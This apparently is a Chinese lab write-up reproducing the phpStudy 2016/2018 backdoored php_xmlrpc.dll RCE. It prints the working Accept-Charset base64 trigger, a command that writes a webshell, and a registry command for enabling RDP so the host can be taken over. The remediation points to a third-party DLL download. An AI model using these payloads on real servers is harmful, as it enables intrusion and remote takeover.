phpstudy_2016-2018_rce 漏洞复现及深度利用

说明 内容
漏洞编号 phpstudy_2016-2018_rce
漏洞名称 RCE(Remote Command|Code Execute)
漏洞评级 高危
影响范围 phpStudy 2016 phpStudy 2018
漏洞描述 攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。

漏洞描述

攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。RCE(Remote Command|Code Execute)

Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。 其中2016、2018版本的phpstudy存在被黑客恶意篡改后形成的RCE漏洞。该漏洞可以直接远程执行系统命令。

影响版本

后门代码存在于\ext\php_xmlrpc.dll模块中,至少有2个版本: phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45。 其中: phpStudy2016查看:

  \phpStudy\php\php-5.2.17\ext\php_xmlrpc.dll
\phpStudy\php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018查看

\PHPTutorial\PHP\PHP-5.2.17\ext\php_xmlrpc.dll
\PHPTutorial\PHP\PHP-5.4.45\ext\php_xmlrpc.dll

漏洞复现

基础环境

组件 版本
OS Windows 7 x64
Web Server phpStudy 2016(特别版)

漏洞扫描

 win7 可以访问server2016

phpstudy_2016-2018_rce 漏洞复现及深度利用_第1张图片

 启动purb工具拦截服务器与浏览器之间的流量

phpstudy_2016-2018_rce 漏洞复现及深度利用_第2张图片

phpstudy_2016-2018_rce 漏洞复现及深度利用_第3张图片 

 将抓到的报文重放

phpstudy_2016-2018_rce 漏洞复现及深度利用_第4张图片

 

漏洞触发验证

触发条件

Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=
Accept-Encoding: gzip,deflate

phpstudy_2016-2018_rce 漏洞复现及深度利用_第5张图片

 phpstudy_2016-2018_rce 漏洞复现及深度利用_第6张图片

 

深度利用

第一种方式burp 执行系统命令

phpstudy软件被插入后门,通过php system函数执行系统命令,所以我们也可以通过system()函数写入webshell,

system(' ECHO ^>"C:/phpStudy/WWW/demon.php ');

第二种方式 也可以在kali里使用 python脚本 实现远程图形化控制

phpstudy_2016-2018_rce 漏洞复现及深度利用_第7张图片

 phpstudy_2016-2018_rce 漏洞复现及深度利用_第8张图片

 phpstudy_2016-2018_rce 漏洞复现及深度利用_第9张图片

 启用账户

phpstudy_2016-2018_rce 漏洞复现及深度利用_第10张图片

 

开启3389端口:reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

phpstudy_2016-2018_rce 漏洞复现及深度利用_第11张图片kali 启动remmina 远程控制对方

phpstudy_2016-2018_rce 漏洞复现及深度利用_第12张图片

 phpstudy_2016-2018_rce 漏洞复现及深度利用_第13张图片

 phpstudy_2016-2018_rce 漏洞复现及深度利用_第14张图片

 phpstudy_2016-2018_rce 漏洞复现及深度利用_第15张图片

 phpstudy_2016-2018_rce 漏洞复现及深度利用_第16张图片

 

修复建议

下载:http://downinfo.myhostadmin.net/phpxmlrpc.rar 解压

复制文件

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

覆盖原路径文件即可。

 

你可能感兴趣的:(漏洞复现及利用,安全,web安全)